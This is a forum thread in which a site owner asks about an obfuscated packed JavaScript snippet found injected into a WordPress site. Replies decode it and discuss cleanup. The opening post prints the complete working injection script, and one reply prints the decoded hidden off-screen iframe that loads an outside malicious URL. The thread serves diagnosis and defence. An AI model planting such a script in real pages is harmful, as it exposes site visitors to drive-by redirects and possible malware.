What does this code mean? Involves a function(p,a,c,k,e,d)

afa · 12-15-2011, 07:03 AM

So I like to think I'm pretty decent with web programming, but this code has me puzzled.

Code:

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookien|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393370783b20746f703a202d3239393470783b223e3c696672616d652077696474683d22343022206865696768743d22333022207372633d22687474703a2f2f3167323166736e32747062642e63652e6d732f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}))</script>

I know it's evil code, I had to put it through a base 64 decode twice to get to this. But all that I'm really after is this: Is there any lingering harm on the website which had this live code? When one tries to create a link to the site (powered by WordPress, by the way) on Facebook, there is this error message:

Code:

Cannot modify header information - headers already sent by (output started at /home/content/xx/xxxxxxx/html/index.php(1) : eval()'d code:37) in /home/content/xx/xxxxxxx/html/wp-includes/pluggable.php on line 897

Even though I've taken the code out from index.php and then functions.php after I spotted it there. Why is this error on FB still happening if this code cannot be found in the text files? Could there be something evil happening in the database?

Any assistance would be most appreciated.

Philip M · 12-15-2011, 07:19 AM

http://www.codeproject.com/KB/script...s_Decoder.aspx

If you replace the opening eval( with document.write( ... all the code is dumped to the screen. If some of it is being interpereted as html rather than being displayed consider forcing your document.write to write between <textarea></textarea> tags.

All advice is supplied packaged by intellectual weight, and not by volume. Contents may settle slightly in transit.

Old Pedant · 12-15-2011, 07:56 AM

The main point of this seems to be to try to get you to bite on some supposedly free offers.

The big long string of hex numbers turns out to be this:

Code:

<div style="position: absolute; left: -1993px; top: -2994px;">
    <iframe width="40" height="30" src="http://1g21fsn2tpbd.ce.ms/i.php?go=1">
    </iframe>
</div>

As you can see, that creates a <div> on your page that is way off the top left edge and so is effectively invisible.

In the <div> it drops in an <iframe> with the "poison" URL. That URL immediately takes over the entire window (that is, it loads its own content into the _top window, replacing whatever was there) and starts trying to bombard you with offers.

Not being foolish enough to click through to some of the offers, I can't guess what else they try to do. My guess would be that they try to get you to download something that will install itself as a virus or spyware on your machine. You are welcome to find out for yourself.

Old Pedant · 12-15-2011, 07:57 AM

The weird part of this is that the hex string there isn't even mildly encrypted. It's almost like they want people to break this open. Every other one like this I've seen, the hex values are at least encrypted with a simple substitution cipher. This one doesn't bother.

Philip M · 12-15-2011, 08:04 AM

Quote:

Originally Posted by Old Pedant

The main point of this seems to be to try to get you to bite on some supposedly free offers.

The cheese in the mousetrap is always free!

Old Pedant · 12-15-2011, 08:05 AM

By the by, Philip, if you *do* document.write that to the screen, it *will* drop the <div> and <iframe> in place and kablooey, you are in their hands. I seriously recommend that if you do stuff like this you inspect each character before document.write'ing it and, if it is "<", replace it with "<". Which is what I did.

Philip M · 12-15-2011, 08:11 AM

Quote:

Originally Posted by Old Pedant

By the by, Philip, if you *do* document.write that to the screen, it *will* drop the <div> and <iframe> in place and kablooey, you are in their hands. I seriously recommend that if you do stuff like this you inspect each character before document.write'ing it and, if it is "<", replace it with "<". Which is what I did.

Yes, I should have mentioned that!

afa · 12-16-2011, 04:39 AM

Thanks, Philip and Old Pedant! I had read that it was possible new pages had been added to the site if such code is implemented, but if that div is the result of the script, then perhaps not? I do wonder why I still have that FB message though with the above being removed several days ago.

Old Pedant · 12-16-2011, 05:10 AM

I don't see how it could *truly* add a new page to the site, as that would mean storing something on your server. And if you have done even a halfway decent job of locking down your server's directory, that shouldn't happen.

What it *could* do is give the *appearance* of new pages. For example, it could locate a menu and tack on another menu item. That menu item's onclick would then be implemented via the code I showed that brings up a foreign site's window just as if it's part of your site.

So maybe that's what it's referring to.

But as to "that FB message"... I admit it does look like they seem to have figured a way to try to stick something in your page headers. The message results because, indeed, if you try to modify an HTML header and *ANY* if HTML tags (even the <html> tag itself) have already been sent to the browser, then you can't do so. So it sounds like their attemped hack isn't happening, but you are seeing the vestiges of it in the form of that message.

felgall · 12-16-2011, 07:54 PM

The p,a,c,k,e,d function is generated by an early JavaScript compressor written by one of the top JavaScript experts. It was used quite often by major scripts up until a few years ago to make the script to be downloaded a lot smaller. Older versions of JQuery used to use it.

In the last few years more and more people have support for HTTP 1.1 enabled and so that can be used to compress all files. This means that a minified version of a script compressed with HTTP 1.1 ends up being a smaller download than the p,a,c,k,e,d version without the need to have the JavaScript decompress itself in the browser. This effectively made p,a,c,k,e,d obsolete. Of course some people still use it simply because it conceals the code making it slightly harder to read.